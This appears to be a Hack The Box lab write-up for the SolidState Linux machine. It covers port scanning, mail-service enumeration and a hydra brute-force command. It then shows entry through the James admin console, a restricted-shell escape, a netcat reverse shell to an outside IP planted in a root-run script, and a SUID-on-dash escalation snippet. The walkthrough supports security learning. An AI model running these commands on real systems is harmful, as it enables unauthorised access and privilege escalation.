HTB Write-up SolidState (Linux)

One thing I didn't do was to scan all ports.

There's 4555 open

Nmap Result: 

22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey: 
|   2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
|   256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_  256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp  open  smtp?
|_smtp-commands: Couldn't establish connection on port 25
80/tcp  open  http    Apache httpd 2.4.25 ((Debian))
|_http-title: Home - Solid State Security
|_http-server-header: Apache/2.4.25 (Debian)
110/tcp open  pop3?
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
119/tcp open  nntp?
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Port 80:

SMTP enum:

found webadmin@solid-state-security.com for email

found thi https://www.hackingarticles.in/4-ways-smtp-enumeration/#:~:text=%204%20ways%20to%20SMTP%20Enumeration%20%201,to%20VRFY%2C%20EXPN%2C%20and%20RCPT%20TO...%20More%20

ismtp -h 10.129.29.189 -e email.txt

POP3 enum:

JAMES

running nmap -p 110,995 --script "pop3-capabilities or pop3-ntlm-info" -sV 10.129.29.189

nothing

brute forcing pop authentication with hydra...no luck? 

hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V

119 NNTP Enum:

4555 RSIP

nc 10.129.29.189 4555

got in

reset password for users

signed in from Evolution and got a valuable email

Now we are in mindy!

when I first logged in, it had a restricted shell so I used the trick below.

ssh mindy@10.129.29.189 -t "bash --noprofile"

According to the ssh manual page, 

 -t      Force pseudo-terminal allocation.  This can be used to exe‐
             cute arbitrary screen-based programs on a remote machine,
             which can be very useful, e.g. when implementing menu ser‐
             vices.  Multiple -t options force tty allocation, even if
             ssh has no local tty.

now I can see other files.

let's see if we can connect via nc -e /bin/bash 10.10.14.131 1234

it worked!

Let's plug this in in the tmp.py

I waited for a min, and I got a root shell!

Another way to get the root:

#!/usr/bin/env python
import os 
import sys

try: 
    os.system("chmod 4755 /bin/dash")
except:
    sys.exit() 
    

#4 -> setuid bit 755 default perm for most binary

dash -> another terminal. doesn't strip the setuid bit like bash doesn't.

so if we can set the SUID bit separately and execute it, then we can escalate privilege.

type "dash" to call the executable once the permission is confirmed to be changed to -rwsr

PreviousHTB Write-up Jeeves (Windows)NextHTB Write-up Nineveh

Last updated